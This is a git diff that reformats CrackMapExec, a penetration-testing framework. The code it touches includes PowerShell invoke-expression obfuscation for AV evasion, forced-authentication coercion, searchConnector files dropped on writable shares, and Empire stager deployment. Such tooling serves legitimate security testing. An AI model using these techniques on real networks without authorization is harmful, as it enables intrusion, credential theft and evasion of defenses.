choice(baseScriptArray), - str_join - + "(" - + choice(["", " "]) - + "''" - + choice(["", " "]) - + "," - + choice(["", " "]) - + choice(baseScriptArray) - + choice(["", " "]) - + ")", - '"' - + choice(["", " "]) - + "$(" - + choice(["", " "]) - + set_ofs_var - + choice(["", " "]) - + ")" - + choice(["", " "]) - + '"' - + choice(["", " "]) - + "+" - + choice(["", " "]) - + str_str - + choice(baseScriptArray) - + choice(["", " "]) - + "+" - + '"' - + choice(["", " "]) - + "$(" - + choice(["", " "]) - + set_ofs_var_back - + choice(["", " "]) - + ")" - + choice(["", " "]) - + '"', + str_join + "(" + choice(["", " "]) + "''" + choice(["", " "]) + "," + choice(["", " "]) + choice(baseScriptArray) + choice(["", " "]) + ")", + '"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var + choice(["", " "]) + ")" + choice(["", " "]) + '"' + choice(["", " "]) + "+" + choice(["", " "]) + str_str + choice(baseScriptArray) + choice(["", " "]) + "+" + '"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var_back + choice(["", " "]) + ")" + choice(["", " "]) + '"', ] # Randomly select one of the above commands. 
@@ -545,38 +384,12 @@ def invoke_obfuscation(script_string): # These methods draw on common environment variable values and PowerShell Automatic Variable # values/methods/members/properties/etc. invocationOperator = choice([".", "&"]) + choice(["", " "]) - invoke_expression_syntax.append( - invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')" - ) - invoke_expression_syntax.append( - invocationOperator - + "( $PSHome[" - + choice(["4", "21"]) - + "]+$PSHOME[" - + choice(["30", "34"]) - + "]+'x')" - ) - invoke_expression_syntax.append( - invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')" - ) - invoke_expression_syntax.append( - invocationOperator - + "( $env:ComSpec[4," - + choice(["15", "24", "26"]) - + ",25]-Join'')" - ) - invoke_expression_syntax.append( - invocationOperator - + "((" - + choice(["Get-Variable", "GV", "Variable"]) - + " '*mdr*').Name[3,11,2]-Join'')" - ) - invoke_expression_syntax.append( - invocationOperator - + "( " - + choice(["$VerbosePreference.ToString()", "([String]$VerbosePreference)"]) - + "[1,3]+'x'-Join'')" - ) + invoke_expression_syntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')") + invoke_expression_syntax.append(invocationOperator + "( $PSHome[" + choice(["4", "21"]) + "]+$PSHOME[" + choice(["30", "34"]) + "]+'x')") + invoke_expression_syntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')") + invoke_expression_syntax.append(invocationOperator + "( $env:ComSpec[4," + choice(["15", "24", "26"]) + ",25]-Join'')") + invoke_expression_syntax.append(invocationOperator + "((" + choice(["Get-Variable", "GV", "Variable"]) + " '*mdr*').Name[3,11,2]-Join'')") + invoke_expression_syntax.append(invocationOperator + "( " + choice(["$VerbosePreference.ToString()", "([String]$VerbosePreference)"]) + "[1,3]+'x'-Join'')") # Randomly choose from above invoke operation syntaxes. 
invokeExpression = choice(invoke_expression_syntax) @@ -586,21 +399,8 @@ def invoke_obfuscation(script_string): # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) invokeOptions = [ - choice(["", " "]) - + invokeExpression - + choice(["", " "]) - + "(" - + choice(["", " "]) - + newScript - + choice(["", " "]) - + ")" - + choice(["", " "]), - choice(["", " "]) - + newScript - + choice(["", " "]) - + "|" - + choice(["", " "]) - + invokeExpression, + choice(["", " "]) + invokeExpression + choice(["", " "]) + "(" + choice(["", " "]) + newScript + choice(["", " "]) + ")" + choice(["", " "]), + choice(["", " "]) + newScript + choice(["", " "]) + "|" + choice(["", " "]) + invokeExpression, ] obfuscated_payload = choice(invokeOptions) diff --git a/cme/loaders/moduleloader.py b/cme/loaders/moduleloader.py index 5ef486b1..17784ce8 100755 --- a/cme/loaders/moduleloader.py +++ b/cme/loaders/moduleloader.py @@ -42,9 +42,7 @@ class ModuleLoader: self.logger.fail(f"{module_path} missing the options function") module_error = True elif not hasattr(module, "on_login") and not (module, "on_admin_login"): - self.logger.fail( - f"{module_path} missing the on_login/on_admin_login function(s)" - ) + self.logger.fail(f"{module_path} missing the on_login/on_admin_login function(s)") module_error = True # elif not hasattr(module, 'chain_support'): # self.logger.fail('{} missing the chain_support variable'.format(module_path)) @@ -80,13 +78,9 @@ class ModuleLoader: self.logger.debug(f"Protocol: {self.args.protocol}") if self.args.protocol in module.supported_protocols: try: - module_logger = CMEAdapter( - extra={"module_name": module.name.upper()} - ) + module_logger = CMEAdapter(extra={"module_name": module.name.upper()}) except Exception as e: - self.logger.fail( - f"Error loading CMEAdaptor for module {module.name.upper()}: {e}" - ) + self.logger.fail(f"Error loading CMEAdaptor for module {module.name.upper()}: {e}") context = Context(self.db, module_logger, self.args) module_options = {} @@ -97,9 +91,7 @@ class ModuleLoader: module.options(context, module_options) return module else: - self.logger.fail( - f"Module {module.name.upper()} is not supported for protocol {self.args.protocol}" - ) + self.logger.fail(f"Module {module.name.upper()} is not supported for protocol {self.args.protocol}") sys.exit(1) def get_module_info(self, module_path): diff --git a/cme/logger.py b/cme/logger.py index 7c1d0023..79a52325 100755 --- a/cme/logger.py +++ b/cme/logger.py @@ -55,11 +55,7 @@ class CMEAdapter(logging.LoggerAdapter): ) # If the logger is being called from CMEServer - if ( - len(self.extra) == 2 - and ("module_name" in self.extra.keys()) - and ("host" in self.extra.keys()) - ): + if len(self.extra) == 2 and ("module_name" in self.extra.keys()) and ("host" in self.extra.keys()): return ( f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}", kwargs, @@ -86,9 +82,7 @@ class CMEAdapter(logging.LoggerAdapter): except AttributeError: pass - msg, kwargs = self.format( - f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs - ) + msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs) text = Text.from_ansi(msg) cme_console.print(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs) @@ -103,9 +97,7 @@ class CMEAdapter(logging.LoggerAdapter): except AttributeError: pass - msg, kwargs = self.format( - f"{colored('[+]', 'green', attrs=['bold'])} {msg}", kwargs - ) + msg, kwargs = 
self.format(f"{colored('[+]', 'green', attrs=['bold'])} {msg}", kwargs) text = Text.from_ansi(msg) cme_console.print(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs) @@ -134,9 +126,7 @@ class CMEAdapter(logging.LoggerAdapter): return except AttributeError: pass - msg, kwargs = self.format( - f"{colored('[-]', 'red', attrs=['bold'])} {msg}", kwargs - ) + msg, kwargs = self.format(f"{colored('[-]', 'red', attrs=['bold'])} {msg}", kwargs) text = Text.from_ansi(msg) cme_console.print(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs) @@ -168,9 +158,7 @@ class CMEAdapter(logging.LoggerAdapter): self.logger.info(text) def add_file_log(self, log_file=None): - file_formatter = TermEscapeCodeFormatter( - "%(asctime)s - %(levelname)s - %(message)s" - ) + file_formatter = TermEscapeCodeFormatter("%(asctime)s - %(levelname)s - %(message)s") output_file = self.init_log_file() if log_file is None else log_file file_creation = False @@ -182,15 +170,9 @@ class CMEAdapter(logging.LoggerAdapter): with file_handler._open() as f: if file_creation: - f.write( - "[%s]> %s\n\n" - % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)) - ) + f.write("[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv))) else: - f.write( - "\n[%s]> %s\n\n" - % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)) - ) + f.write("\n[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv))) file_handler.setFormatter(file_formatter) self.logger.addHandler(file_handler) diff --git a/cme/modules/IOXIDResolver.py b/cme/modules/IOXIDResolver.py index b7067189..32bddb64 100644 --- a/cme/modules/IOXIDResolver.py +++ b/cme/modules/IOXIDResolver.py @@ -13,9 +13,7 @@ from impacket.dcerpc.v5.dcomrt import IObjectExporter class CMEModule: name = "ioxidresolver" - description = ( - "Thie module helps you to identify hosts that have additional active interfaces" - ) + description = "Thie module helps you to identify hosts that have additional active interfaces" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = False diff --git a/cme/modules/MachineAccountQuota.py b/cme/modules/MachineAccountQuota.py index fc7f7550..59b4753e 100644 --- a/cme/modules/MachineAccountQuota.py +++ b/cme/modules/MachineAccountQuota.py @@ -29,6 +29,4 @@ class CMEModule: searchFilter = "(objectClass=*)" attributes = ["ms-DS-MachineAccountQuota"] result = connection.search(searchFilter, attributes) - context.log.highlight( - "MachineAccountQuota: %d" % result[0]["attributes"][0]["vals"][0] - ) + context.log.highlight("MachineAccountQuota: %d" % result[0]["attributes"][0]["vals"][0]) diff --git a/cme/modules/adcs.py b/cme/modules/adcs.py index 106215e3..50f87c26 100644 --- a/cme/modules/adcs.py +++ b/cme/modules/adcs.py @@ -45,9 +45,7 @@ class CMEModule: search_filter = f"(distinguishedName=CN={self.server},CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration," self.context.log.highlight("Using PKI CN: {}".format(self.server)) - context.log.display( - "Starting LDAP search with search filter '{}'".format(search_filter) - ) + context.log.display("Starting LDAP search with search filter '{}'".format(search_filter)) try: sc = ldap.SimplePagedResultsControl() @@ -101,22 +99,14 @@ class CMEModule: urls.append(match.group(1)) except Exception as e: entry = host_name or "item" - self.context.log.fail( - "Skipping {}, cannot process LDAP entry due to error: '{}'".format( - entry, str(e) - ) - ) + 
self.context.log.fail("Skipping {}, cannot process LDAP entry due to error: '{}'".format(entry, str(e))) if host_name: - self.context.log.highlight( - "Found PKI Enrollment Server: {}".format(host_name) - ) + self.context.log.highlight("Found PKI Enrollment Server: {}".format(host_name)) if cn: self.context.log.highlight("Found CN: {}".format(cn)) for url in urls: - self.context.log.highlight( - "Found PKI Enrollment WebService: {}".format(url) - ) + self.context.log.highlight("Found PKI Enrollment WebService: {}".format(url)) def process_templates(self, item): """ @@ -136,9 +126,7 @@ class CMEModule: templates.append(template_name) except Exception as e: entry = template_name or "item" - self.context.log.fail( - f"Skipping {entry}, cannot process LDAP entry due to error: '{e}'" - ) + self.context.log.fail(f"Skipping {entry}, cannot process LDAP entry due to error: '{e}'") if templates: for t in templates: diff --git a/cme/modules/bh_owned.py b/cme/modules/bh_owned.py index ff2edd82..c71cfb4f 100644 --- a/cme/modules/bh_owned.py +++ b/cme/modules/bh_owned.py @@ -60,19 +60,12 @@ class CMEModule: context.log.debug(f"User: {self.neo4j_user}, Password: {self.neo4j_pass}") try: - driver = GraphDatabase.driver( - uri, auth=(self.neo4j_user, self.neo4j_pass), encrypted=False - ) + driver = GraphDatabase.driver(uri, auth=(self.neo4j_user, self.neo4j_pass), encrypted=False) except AuthError: - context.log.fail( - f"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are" - " not valid. See --options" - ) + context.log.fail(f"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are" " not valid. See --options") sys.exit() except ServiceUnavailable: - context.log.fail( - f"Neo4J does not seem to be available on {uri}. See --options" - ) + context.log.fail(f"Neo4J does not seem to be available on {uri}. See --options") sys.exit() except Exception as e: context.log.fail("Unexpected error with Neo4J") @@ -81,22 +74,14 @@ class CMEModule: with driver.session() as session: with session.begin_transaction() as tx: - result = tx.run( - f'MATCH (c:Computer {{name:"{host_fqdn}"}}) SET c.owned=True RETURN' - " c.name AS name" - ) + result = tx.run(f'MATCH (c:Computer {{name:"{host_fqdn}"}}) SET c.owned=True RETURN' " c.name AS name") record = result.single() try: value = record.value() except AttributeError: value = [] if len(value) > 0: - context.log.success( - f"Node {host_fqdn} successfully set as owned in BloodHound" - ) + context.log.success(f"Node {host_fqdn} successfully set as owned in BloodHound") else: - context.log.fail( - f"Node {host_fqdn} does not appear to be in Neo4J database. Have you" - " imported the correct data?" - ) + context.log.fail(f"Node {host_fqdn} does not appear to be in Neo4J database. 
Have you" " imported the correct data?") driver.close() diff --git a/cme/modules/daclread.py b/cme/modules/daclread.py index 0321d7f2..83f185db 100644 --- a/cme/modules/daclread.py +++ b/cme/modules/daclread.py @@ -122,12 +122,8 @@ class ACE_FLAGS(Enum): # Since these two flags are the same for Allowed and Denied access, the same class will be used from 'ldaptypes' # https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-access_allowed_object_ace class OBJECT_ACE_FLAGS(Enum): - ACE_OBJECT_TYPE_PRESENT = ( - ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT - ) - ACE_INHERITED_OBJECT_TYPE_PRESENT = ( - ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT - ) + ACE_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT + ACE_INHERITED_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT # Access Mask enum @@ -223,9 +219,7 @@ class CMEModule: self.context = context if not module_options: - context.log.fail( - "Select an option, example: -M daclread -o TARGET=Administrator ACTION=read" - ) + context.log.fail("Select an option, example: -M daclread -o TARGET=Administrator ACTION=read") exit(1) if module_options and "TARGET" in module_options: @@ -274,9 +268,7 @@ class CMEModule: On a successful LDAP login we perform a search for the targets' SID, their Security Decriptors and the principal's SID if there is one specified """ - context.log.highlight( - "Be carefull, this module cannot read the DACLS recursively." - ) + context.log.highlight("Be carefull, this module cannot read the DACLS recursively.") self.baseDN = connection.ldapConnection._baseDN self.ldap_session = connection.ldapConnection @@ -287,18 +279,17 @@ class CMEModule: self.principal_sid = format_sid( self.ldap_session.search( searchBase=self.baseDN, - searchFilter="(sAMAccountName=%s)" - % escape_filter_chars(_lookedup_principal), + searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal), attributes=["objectSid"], - )[0][1][0][1][0] - ) - context.log.highlight( - "Found principal SID to filter on: %s" % self.principal_sid + )[0][ + 1 + ][0][ + 1 + ][0] ) + context.log.highlight("Found principal SID to filter on: %s" % self.principal_sid) except Exception as e: - context.log.fail( - "Principal SID not found in LDAP (%s)" % _lookedup_principal - ) + context.log.fail("Principal SID not found in LDAP (%s)" % _lookedup_principal) exit(1) # Searching for the targets SID and their Security Decriptors @@ -309,19 +300,11 @@ class CMEModule: self.search_target_principal_security_descriptor(context, connection) # Extract security descriptor data self.target_principal_dn = self.target_principal[0] - self.principal_raw_security_descriptor = str( - self.target_principal[1][0][1][0] - ).encode("latin-1") - self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR( - data=self.principal_raw_security_descriptor - ) - context.log.highlight( - "Target principal found in LDAP (%s)" % self.target_principal[0] - ) + self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1") + self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor) + context.log.highlight("Target principal found in LDAP (%s)" % self.target_principal[0]) except Exception as e: - context.log.fail( - "Target SID not found in LDAP (%s)" % self.target_sAMAccountName - ) + context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName) 
exit(1) if self.action == "read": @@ -336,27 +319,14 @@ class CMEModule: try: self.target_sAMAccountName = target.strip() # Searching for target account with its security descriptor - self.search_target_principal_security_descriptor( - context, connection - ) + self.search_target_principal_security_descriptor(context, connection) # Extract security descriptor data self.target_principal_dn = self.target_principal[0] - self.principal_raw_security_descriptor = str( - self.target_principal[1][0][1][0] - ).encode("latin-1") - self.principal_security_descriptor = ( - ldaptypes.SR_SECURITY_DESCRIPTOR( - data=self.principal_raw_security_descriptor - ) - ) - context.log.highlight( - "Target principal found in LDAP (%s)" - % self.target_sAMAccountName - ) + self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1") + self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor) + context.log.highlight("Target principal found in LDAP (%s)" % self.target_sAMAccountName) except Exception as e: - context.log.fail( - "Target SID not found in LDAP (%s)" % self.target_sAMAccountName - ) + context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName) continue if self.action == "read": @@ -367,9 +337,7 @@ class CMEModule: # Main read funtion # Prints the parsed DACL def read(self, context): - parsed_dacl = self.parse_dacl( - context, self.principal_security_descriptor["Dacl"] - ) + parsed_dacl = self.parse_dacl(context, self.principal_security_descriptor["Dacl"]) self.print_parsed_dacl(context, parsed_dacl) return @@ -377,9 +345,7 @@ class CMEModule: # This function is called before any writing action (write, remove or restore) def backup(self, context): backup = {} - backup["sd"] = binascii.hexlify(self.principal_raw_security_descriptor).decode( - "latin-1" - ) + backup["sd"] = binascii.hexlify(self.principal_raw_security_descriptor).decode("latin-1") backup["dn"] = str(self.target_principal_dn) if not self.filename: self.filename = "dacledit-%s-%s.bak" % ( @@ -400,8 +366,7 @@ class CMEModule: _lookedup_principal = self.target_sAMAccountName target = self.ldap_session.search( searchBase=self.baseDN, - searchFilter="(sAMAccountName=%s)" - % escape_filter_chars(_lookedup_principal), + searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal), attributes=["nTSecurityDescriptor"], searchControls=controls, ) @@ -416,10 +381,7 @@ class CMEModule: try: self.target_principal = target[0] except Exception as e: - context.log.fail( - "Principal not found in LDAP (%s), probably an LDAP session issue." - % _lookedup_principal - ) + context.log.fail("Principal not found in LDAP (%s), probably an LDAP session issue." 
% _lookedup_principal) exit(0) # Attempts to retieve the SID and Distinguisehd Name from the sAMAccountName @@ -452,12 +414,18 @@ class CMEModule: searchBase=self.baseDN, searchFilter="(objectSid=%s)" % sid, attributes=["sAMAccountName"], - )[0][0] + )[ + 0 + ][0] samname = self.ldap_session.search( searchBase=self.baseDN, searchFilter="(objectSid=%s)" % sid, attributes=["sAMAccountName"], - )[0][1][0][1][0] + )[0][ + 1 + ][0][ + 1 + ][0] return samname except Exception as e: context.log.debug("SID not found in LDAP: %s" % sid) @@ -516,8 +484,7 @@ class CMEModule: ace["Ace"]["Mask"]["Mask"], ) parsed_ace["Trustee (SID)"] = "%s (%s)" % ( - self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) - or "UNKNOWN", + self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN", ace["Ace"]["Sid"].formatCanonical(), ) @@ -550,31 +517,23 @@ class CMEModule: parsed_ace["Object type (GUID)"] = "UNKNOWN (%s)" % obj_type # Extracts the InheritedObjectType GUID values if ace["Ace"]["InheritedObjectTypeLen"] != 0: - inh_obj_type = bin_to_string( - ace["Ace"]["InheritedObjectType"] - ).lower() + inh_obj_type = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower() try: parsed_ace["Inherited type (GUID)"] = "%s (%s)" % ( OBJECT_TYPES_GUID[inh_obj_type], inh_obj_type, ) except KeyError: - parsed_ace["Inherited type (GUID)"] = ( - "UNKNOWN (%s)" % inh_obj_type - ) + parsed_ace["Inherited type (GUID)"] = "UNKNOWN (%s)" % inh_obj_type # Extract the Trustee SID (the object that has the right over the DACL bearer) parsed_ace["Trustee (SID)"] = "%s (%s)" % ( - self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) - or "UNKNOWN", + self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN", ace["Ace"]["Sid"].formatCanonical(), ) else: # If the ACE is not an access allowed - context.log.debug( - "ACE Type (%s) unsupported for parsing yet, feel free to contribute" - % ace["TypeName"] - ) + context.log.debug("ACE Type (%s) unsupported for parsing yet, feel free to contribute" % ace["TypeName"]) parsed_ace = {} parsed_ace["ACE type"] = ace["TypeName"] _ace_flags = [] @@ -582,9 +541,7 @@ class CMEModule: if ace.hasFlag(FLAG.value): _ace_flags.append(FLAG.name) parsed_ace["ACE flags"] = ", ".join(_ace_flags) or "None" - parsed_ace[ - "DEBUG" - ] = "ACE type not supported for parsing by dacleditor.py, feel free to contribute" + parsed_ace["DEBUG"] = "ACE type not supported for parsing by dacleditor.py, feel free to contribute" return parsed_ace # Prints a full DACL by printing each parsed ACE @@ -600,76 +557,38 @@ class CMEModule: # Filter on specific rights if self.rights is not None: try: - if (self.rights == "FullControl") and ( - self.rights not in parsed_ace["Access mask"] - ): + if (self.rights == "FullControl") and (self.rights not in parsed_ace["Access mask"]): print_ace = False - if (self.rights == "DCSync") and ( - ("Object type (GUID)" not in parsed_ace) - or ( - RIGHTS_GUID.DS_Replication_Get_Changes_All.value - not in parsed_ace["Object type (GUID)"] - ) - ): + if (self.rights == "DCSync") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.DS_Replication_Get_Changes_All.value not in parsed_ace["Object type (GUID)"])): print_ace = False - if (self.rights == "WriteMembers") and ( - ("Object type (GUID)" not in parsed_ace) - or ( - RIGHTS_GUID.WriteMembers.value - not in parsed_ace["Object type (GUID)"] - ) - ): + if (self.rights == "WriteMembers") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.WriteMembers.value not in parsed_ace["Object 
type (GUID)"])): print_ace = False - if (self.rights == "ResetPassword") and ( - ("Object type (GUID)" not in parsed_ace) - or ( - RIGHTS_GUID.ResetPassword.value - not in parsed_ace["Object type (GUID)"] - ) - ): + if (self.rights == "ResetPassword") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.ResetPassword.value not in parsed_ace["Object type (GUID)"])): print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) # Filter on specific right GUID if self.rights_guid is not None: try: - if ("Object type (GUID)" not in parsed_ace) or ( - self.rights_guid not in parsed_ace["Object type (GUID)"] - ): + if ("Object type (GUID)" not in parsed_ace) or (self.rights_guid not in parsed_ace["Object type (GUID)"]): print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) # Filter on ACE type if self.ace_type == "allowed": try: - if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ( - "ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"] - ): + if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"]): print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) else: try: - if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ( - "ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"] - ): + if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"]): print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) # Filter on trusted principal if self.principal_sid is not None: @@ -677,10 +596,7 @@ class CMEModule: if self.principal_sid not in parsed_ace["Trustee (SID)"]: print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) if print_ace: self.context.log.highlight("%-28s" % "ACE[%d] info" % i) self.print_parsed_ace(parsed_ace) @@ -691,9 +607,7 @@ class CMEModule: def print_parsed_ace(self, parsed_ace): elements_name = list(parsed_ace.keys()) for attribute in elements_name: - self.context.log.highlight( - " %-26s: %s" % (attribute, parsed_ace[attribute]) - ) + self.context.log.highlight(" %-26s: %s" % (attribute, parsed_ace[attribute])) # Retrieves the GUIDs for the specified rights def build_guids_for_rights(self): diff --git a/cme/modules/dfscoerce.py b/cme/modules/dfscoerce.py index 9266afb0..58bdbf55 100644 --- a/cme/modules/dfscoerce.py +++ b/cme/modules/dfscoerce.py @@ -38,9 +38,7 @@ class CMEModule: domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, - target=connection.host - if not 
connection.kerberos - else connection.hostname + "." + connection.domain, + target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain, doKerberos=connection.kerberos, dcHost=connection.kdcHost, ) @@ -105,12 +103,8 @@ class NetrDfsAddRootResponse(NDRCALL): class TriggerAuth: - def connect( - self, username, password, domain, lmhash, nthash, target, doKerberos, dcHost - ): - rpctransport = transport.DCERPCTransportFactory( - r"ncacn_np:%s[\PIPE\netdfs]" % target - ) + def connect(self, username, password, domain, lmhash, nthash, target, doKerberos, dcHost): + rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\PIPE\netdfs]" % target) if hasattr(rpctransport, "set_credentials"): rpctransport.set_credentials( username=username, diff --git a/cme/modules/drop-sc.py b/cme/modules/drop-sc.py index b10f0a48..328f3496 100644 --- a/cme/modules/drop-sc.py +++ b/cme/modules/drop-sc.py @@ -49,18 +49,13 @@ class CMEModule: scfile = open(self.scfile_path, "w") scfile.truncate(0) scfile.write('') - scfile.write( - "' - ) + scfile.write("') scfile.write("Microsoft Outlook") scfile.write("false") scfile.write("true") scfile.write(f"{self.url}/0001.ico") scfile.write("") - scfile.write( - "{91475FE5-586B-4EBA-8D75-D17434B8CDF6}" - ) + scfile.write("{91475FE5-586B-4EBA-8D75-D17434B8CDF6}") scfile.write("") scfile.write("") scfile.write("{}".format(self.url)) @@ -72,37 +67,19 @@ class CMEModule: shares = connection.shares() for share in shares: context.log.debug(f"Share: {share}") - if "WRITE" in share["access"] and ( - share["name"] == self.sharename - if self.sharename != "" - else share["name"] not in ["C$", "ADMIN$"] - ): + if "WRITE" in share["access"] and (share["name"] == self.sharename if self.sharename != "" else share["name"] not in ["C$", "ADMIN$"]): context.log.success(f"Found writable share: {share['name']}") if not self.cleanup: with open(self.scfile_path, "rb") as scfile: try: - connection.conn.putFile( - share["name"], self.file_path, scfile.read - ) - context.log.success( - f"[OPSEC] Created {self.filename}.searchConnector-ms" - f" file on the {share['name']} share" - ) + connection.conn.putFile(share["name"], self.file_path, scfile.read) + context.log.success(f"[OPSEC] Created {self.filename}.searchConnector-ms" f" file on the {share['name']} share") except Exception as e: context.log.exception(e) - context.log.fail( - f"Error writing {self.filename}.searchConnector-ms file" - f" on the {share['name']} share: {e}" - ) + context.log.fail(f"Error writing {self.filename}.searchConnector-ms file" f" on the {share['name']} share: {e}") else: try: connection.conn.deleteFile(share["name"], self.file_path) - context.log.success( - f"Deleted {self.filename}.searchConnector-ms file on the" - f" {share['name']} share" - ) + context.log.success(f"Deleted {self.filename}.searchConnector-ms file on the" f" {share['name']} share") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting {self.filename}.searchConnector-ms" - f" file on share {share['name']}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting {self.filename}.searchConnector-ms" f" file on share {share['name']}: {e}") diff --git a/cme/modules/empire_exec.py b/cme/modules/empire_exec.py index d1ad3557..f463867a 100644 --- a/cme/modules/empire_exec.py +++ b/cme/modules/empire_exec.py @@ -41,11 +41,7 @@ class CMEModule: obfuscate = True if "OBFUSCATE" in module_options else False # we can use commands instead of backslashes - this is because Linux and OSX treat them differently 
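# A minimal sketch of the option handling in this hunk, assuming module_options behaves
# like a plain dict (the helper name and defaults below are illustrative, not part of
# empire_exec.py): dict.get() expresses the same fallback as the collapsed conditional
# expression, and the membership test alone already yields the boolean flag.
def parse_obfuscation_options(module_options, default_obfuscation="Token,All,1"):
    obfuscate = "OBFUSCATE" in module_options
    obfuscate_cmd = module_options.get("OBFUSCATE_CMD", default_obfuscation)
    return obfuscate, obfuscate_cmd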
default_obfuscation = "Token,All,1" - obfuscate_cmd = ( - module_options["OBFUSCATE_CMD"] - if "OBFUSCATE_CMD" in module_options - else default_obfuscation - ) + obfuscate_cmd = module_options["OBFUSCATE_CMD"] if "OBFUSCATE_CMD" in module_options else default_obfuscation context.log.debug(f"Obfuscate: {obfuscate} - Obfuscate_cmd: {obfuscate_cmd}") # Pull the host and port from the config file @@ -111,9 +107,7 @@ class CMEModule: if "not found" in stager_response.json()["detail"]: context.log.fail(f"Listener {module_options['LISTENER']} not found") else: - context.log.fail( - f"Stager response received a non-200 when creating stager: {stager_response.status_code} {stager_response.text}" - ) + context.log.fail(f"Stager response received a non-200 when creating stager: {stager_response.status_code} {stager_response.text}") sys.exit(1) context.log.debug(f"Response Code: {stager_response.status_code}") @@ -134,13 +128,9 @@ class CMEModule: self.empire_launcher = download_response.text if download_response.status_code == 200: - context.log.success( - f"Successfully generated launcher for listener '{module_options['LISTENER']}'" - ) + context.log.success(f"Successfully generated launcher for listener '{module_options['LISTENER']}'") else: - context.log.fail( - f"Something went wrong when retrieving stager Powershell command" - ) + context.log.fail(f"Something went wrong when retrieving stager Powershell command") def on_admin_login(self, context, connection): if self.empire_launcher: diff --git a/cme/modules/enum_av.py b/cme/modules/enum_av.py index a01c350c..94f861ac 100644 --- a/cme/modules/enum_av.py +++ b/cme/modules/enum_av.py @@ -33,16 +33,8 @@ class CMEModule: def on_login(self, context, connection): success = 0 results = {} - target = ( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) - context.log.debug( - "Detecting installed services on {} using LsarLookupNames()...".format( - target - ) - ) + target = connection.host if not connection.kerberos else connection.hostname + "." + 